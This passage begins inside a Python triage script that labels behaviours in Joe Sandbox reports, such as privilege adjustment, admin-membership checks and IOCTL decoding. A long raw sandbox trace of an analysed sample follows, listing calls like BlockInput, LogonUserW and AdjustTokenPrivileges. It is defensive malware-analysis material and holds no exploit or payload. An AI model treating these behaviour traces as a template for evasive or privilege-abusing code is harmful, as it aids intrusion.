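    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# 0x4D02C = CTL_CODE(device type 4, function 0x40B, METHOD_BUFFERED, read|write),
# which ntddscsi.h defines as IOCTL_ATA_PASS_THROUGH.
KNOWN_IOCTLS = {0x4D02C: "IOCTL_ATA_PASS_THROUGH"}
AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17
SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS = 0x20, 0x220

def parse_entries(report: str) -> List[List[Dict[str, object]]]:
    """One list of call dicts per "APIs ... Memory Dump Source" block, in order."""
    entries, current, in_apis = [], [], False
    for line in report.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            in_apis, current = True, []
        elif stripped == "Memory Dump Source":
            if in_apis:
                entries.append(current)
            in_apis = False
        elif in_apis and (m := API_RE.match(line)):
            raw = m.group("args") or ""
            current.append({"name": m.group("name"), "module": m.group("module"),
                            "args": [a.strip() for a in raw.split(",") if a.strip()],
                            "ref": m.group("ref").upper(),
                            "subcall": "Part of subcall function" in line})
    return entries

def _hex(arg: str) -> Optional[int]:
    """Joe Sandbox prints unresolved arguments as '?'; parse only real hex."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def decode_ioctl(code: int) -> Dict[str, int]:
    """Split a Windows I/O control code into its CTL_CODE fields."""
    return {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}

def classify(entry: List[Dict[str, object]]) -> List[str]:
    """Map the API set (and decodable arguments) of one entry to behaviour labels."""
    names = {c["name"] for c in entry}
    # Pad with '?' so the argument indexes below never raise; '?' decodes to None.
    args = {c["name"]: list(c["args"]) + ["?"] * 4 for c in entry}
    found: List[str] = []
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= names:
        found.append("process enumeration via Toolhelp32 (process-name checks)")
    if {"socket", "bind"} <= names:
        fam, typ, proto = (_hex(a) for a in args["socket"][:3])
        udp = (fam, typ, proto) == (AF_INET, SOCK_DGRAM, IPPROTO_UDP)
        found.append(("UDP/IPv4" if udp else "unknown-protocol") + " socket bound locally (socket + bind)")
    if {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= names:
        found.append("token privilege adjustment (AdjustTokenPrivileges)")
    if {"AllocateAndInitializeSid", "CheckTokenMembership"} <= names:
        sid = args["AllocateAndInitializeSid"]
        admin = (_hex(sid[2]), _hex(sid[3])) == (SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS)
        found.append("BUILTIN\\Administrators membership check (is-admin test)" if admin
                     else "group membership check (CheckTokenMembership)")
    if "DeviceIoControl" in names and (code := _hex(args["DeviceIoControl"][1])) is not None:
        f, label = decode_ioctl(code), KNOWN_IOCTLS.get(code, f"0x{code:X}")
        found.append(f"DeviceIoControl {label} (device type 0x{f['device_type']:X}, "
                     f"function 0x{f['function']:X}, method {f['method']}, access {f['access']})")
    return found

def triage(report: str) -> List[List[str]]:
    """Parse a report excerpt and classify every function entry, in order."""
    return [classify(e) for e in parse_entries(report)]

if __name__ == "__main__":
    for i, labels in enumerate(triage(SAMPLE)):
        print(f"entry {i}: {labels or ['no rule matched']}")
```

Run as-is it prints one label list per entry of SAMPLE; to apply it to a full report, feed the text of the "APIs" sections to triage() instead. Arguments Joe Sandbox could not resolve appear as '?', which _hex turns into None, so no rule fires on an unresolved value; the DeviceIoControl rule also falls back to printing the raw code when it is not in KNOWN_IOCTLS, which is the point at which a real workflow would look the code up.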
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 498de65df809fb4f3c0900a5fb481f6bbebc5d8277bc19f57a244d3a957db620
                                        • Instruction ID: 2d3077b11a46eb7f437cd6c924cb4a7998b3c3e968f18d79c249e34cf9671da6
                                        • Opcode Fuzzy Hash: 498de65df809fb4f3c0900a5fb481f6bbebc5d8277bc19f57a244d3a957db620
                                        • Instruction Fuzzy Hash: 26228A74A00216CFDB24EF64C584AAAB7F0FF09304F149469E85EBB351E771AD85CB91
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetParent.USER32(?), ref: 00EBBA0A
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00E819B3,?,?,?,00000006,?), ref: 00EBBA84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        • API String ID: 314495775-0
                                        • Opcode ID: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                                        • Instruction ID: e4177cf55b5140af63cfad540227d8d0020ebc9cd9a6a5e58c4175165fa9c69a
                                        • Opcode Fuzzy Hash: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                                        • Instruction Fuzzy Hash: 8F218734600104AFCB219B28C884DE93BD6AF0B328F5452A9F51D7B2F1C7715D52A751
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EEC966
                                        • FindClose.KERNEL32(00000000), ref: 00EEC996
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                                        • Instruction ID: 9727fba12dd3a27d2db8033c6ff1fc81479a0cf64873becd3186bcba86bbe390
                                        • Opcode Fuzzy Hash: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                                        • Instruction Fuzzy Hash: 791161726106049FD710EF29D845A2AF7E9FF84324F14955EF9AAE7292DB30AC05CB81
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00EBBB8A,?,?,?), ref: 00F0C8E1
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0C8C7
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID:
                                        • API String ID: 1273190321-0
                                        • Opcode ID: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                                        • Instruction ID: 04ee7d7fb0806de914e214d00dceeef526fda6b24d2069f48a9ba56306d84e28
                                        • Opcode Fuzzy Hash: 39cab49dcae564c1b075bb1e7bf25e4c80952ac915d2f34e5bf793082fb55900
                                        • Instruction Fuzzy Hash: 3601FC31200214ABCB21AF14CC44F663BE7FF86324F144128F9555B2E1CB315806FBD1
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 00F0CC51
                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00EBBC66,?,?,?,?,?), ref: 00F0CC7A
                                        Similarity
                                        • API ID: ClientDialogNtdllProc_Screen
                                        • String ID:
                                        • API String ID: 3420055661-0
                                        • Opcode ID: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                                        • Instruction ID: 63b703f95680e7490b56dc9eca1aa33385572254e3bb53db6a4702726f265f16
                                        • Opcode Fuzzy Hash: e5fec93d1baac2d9c9c0cbfbf1b592350058088fcc4b64a4dd042a04a0c920ab
                                        • Instruction Fuzzy Hash: 1DF0177241021CBFEB158F85DC099AE7BB9FB48321F04416AF945A2161D3716A64EBA0
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA302
                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EF977D,?,00F0FB84,?), ref: 00EEA314
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                                        • Instruction ID: 9e5042c3df5e1669131029123254a958a71ff3e8900bbe71b0708725964ca5ec
                                        • Opcode Fuzzy Hash: a5a70dadf40328fcf2765dd2160ebc77d2e526c8cf0085f2a6a75d9e306d072e
                                        • Instruction Fuzzy Hash: BDF0823554522DABDB20AFA4CC88FEA776DBF08761F00416AB908E6181D630A944CBA1
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F0CD74
                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00EBBBE5,?,?,?,?), ref: 00F0CDA2
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                                        • Instruction ID: 2d6cd162df737ac8294dc1f9635bcd0c53207353efcc3c2a6bb2e9f7242dda90
                                        • Opcode Fuzzy Hash: bb91dcd99c69ea634d7343006a53e671c60a0b82e689fdde0370197ec1ff1f11
                                        • Instruction Fuzzy Hash: 92E08670100258BFEB249F19DC09FBA3B54FB04760F408225F956DA1E1C771D850F760
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                                        • CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: 74ecc88defc7e174e71c1e00b58544fba45f2b774a0b3d5f36b969f49c196b2e
                                        • Instruction ID: 05d9ab3bbdc38ff493f992ee24993d2ece51f5eee3ae31b91af5db586e37567c
                                        • Opcode Fuzzy Hash: 74ecc88defc7e174e71c1e00b58544fba45f2b774a0b3d5f36b969f49c196b2e
                                        • Instruction Fuzzy Hash: 05E04F71000600EFE7312B20ED04D7377E9FB04390B108469B46680430CB616C90EB10
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00F14178,00EA8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00EAA39A
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EAA3A3
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                                        • Instruction ID: 58b5cf3a3d5faf2318b4332d9f3ba27b413f6d09c67193c518543aebdd3a23f5
                                        • Opcode Fuzzy Hash: 5bdabe3ea7afc431d3db987bcbdc7c72ae71142b8d91ce6e7b3baa21b65a639f
                                        • Instruction Fuzzy Hash: 5CB0923105820CABCA102B91EC09B883F68FB45AB2F404020FA0D84860CB625454AA91
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 00EC428C
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: d19fb5cc338ab43579cee38547075eb2c652233faf5934140e6d8b587d72ad2a
                                        • Instruction ID: 65a8c775409c65bb778a097fc106ba07005840e957becf70f622aa0eaf964e83
                                        • Opcode Fuzzy Hash: d19fb5cc338ab43579cee38547075eb2c652233faf5934140e6d8b587d72ad2a
                                        • Instruction Fuzzy Hash: F3A28A74A00209CFCB24EF98C580AAAB7B1FF59304F249069E91EBB351D771ED42CB91
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                                        • Instruction ID: 4e08fa4fd8bd5e0cb21c5c5b7851ab3a8dd2e0f6e7b3a35124f672b009bc922a
                                        • Opcode Fuzzy Hash: 1c8db73c4f3e4e77a6bdb82e52ac7f6dec5ae1c2924b37fd4e62b5304eab86db
                                        • Instruction Fuzzy Hash: 77324721D69F054DD723A634D832376A258AFFB3D4F15E737F819B99AAEB28D4831100
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                                        • Instruction ID: 87ce0280cd78ec554ff5453c8abc3e90e6707a3db7dd5c19b78bc6f7ca495b18
                                        • Opcode Fuzzy Hash: 46054dc316078982f0ef1ed83d7a7a1ed915a3790139458be6b26ae7efbf9147
                                        • Instruction Fuzzy Hash: AEB1F020E2AF554DD32396398831336FA5CAFBB2D5F52D71BFC2674D22EB2285835141
                                        APIs
                                        • __time64.LIBCMT ref: 00EE8B25
                                          • Part of subcall function 00EA543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00EE91F8,00000000,?,?,?,?,00EE93A9,00000000,?), ref: 00EA5443
                                          • Part of subcall function 00EA543A: __aulldiv.LIBCMT ref: 00EA5463
                                        Similarity
                                        • API ID: Time$FileSystem__aulldiv__time64
                                        • String ID:
                                        • API String ID: 2893107130-0
                                        • Opcode ID: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                                        • Instruction ID: 69dd639f6370ea9e0efef30290b574651ad3fc98f53077cfc3ef40bc384e6811
                                        • Opcode Fuzzy Hash: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                                        • Instruction Fuzzy Hash: A6210F766346148BC329CF29D841A52B3E1EBA5320B288E2CD4E9CF2D0CA30B904DB80
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F0DB46
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                                        • Instruction ID: 4fb1dcb72ea0c1f4b43af42faad37ab1ada993309c2a88963aaca34f7b879014
                                        • Opcode Fuzzy Hash: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                                        • Instruction Fuzzy Hash: 87112C71304125BBFB289EACDC05F7A3B54EB86B30F204314F9519B2D2CBA49D10B3A5
                                        APIs
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00EBBBA2,?,?,?,?,00000000,?), ref: 00F0D740
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                                        • Instruction ID: c59dc7b97fcf1d423b275c99e8d59571712cf2eeae6e3e15de37b4f9deacb6e4
                                        • Opcode Fuzzy Hash: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                                        • Instruction Fuzzy Hash: 6F012839A00118ABDB149F69CC85AFA3B95EF46334F040125FA195B1D2C331AC21F7A0
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00EBBC4F,?,?,?,?,?,00000001,?), ref: 00F0C272
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00E81B04,?,?,?,?,?), ref: 00E818E2
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00EF4218
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0CBEE
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        APIs
                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EE4F18
                                        Similarity
                                        • API ID: mouse_event
                                        • String ID:
                                        • API String ID: 2434400541-0
                                        APIs
                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ED88D1), ref: 00ED8CB3
                                        Similarity
                                        • API ID: LogonUser
                                        • String ID:
                                        • API String ID: 1244722697-0
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00EBBC0C,?,?,?,?,?,?), ref: 00F0CC24
                                          • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B8FE
                                          • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B90D
                                          • Part of subcall function 00F0B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                                          • Part of subcall function 00F0B8EF: CloseHandle.KERNEL32 ref: 00F0B94E
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00E81AEE,?,?,?), ref: 00E816AB
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 00F0CBA4
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 00F0CB75
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E8201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                                          • Part of subcall function 00E8201B: KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00E81AE2,?,?), ref: 00E816D4
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00EC2242
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EAA36A
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                                        • Instruction ID: 75cddf3d90130fbde8357d2cd4c7ecd4cd8155fdb4f6f0cf5be2eb99c1d12a52
                                        • Opcode Fuzzy Hash: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                                        • Instruction Fuzzy Hash: 08222A31505615CBDF388F24C6946BDB7A1EB03308F68646BD852BB3A1EB34DD82DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: b6569bf24f4fb32519d62c68f195598c27664ac7b0d39e6ea65735f2cb9dd880
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 78C180362050A30ADB6D463D943403EBEE15EA77B531A279DE4B2FF5C4EF20E524E620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: 0a498e998ab5fbc64516cf93272ba7534e9069f07b333da2adbf6c8dbf396e69
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: 77C182362051A30ADB6D463D843403EBEE15EA77B531A27ADE4B2FF5D4EF20E5249620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: 1c1214552a72de12ce12e84b70acbac49362d2217005addbc164062bb7396afe
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
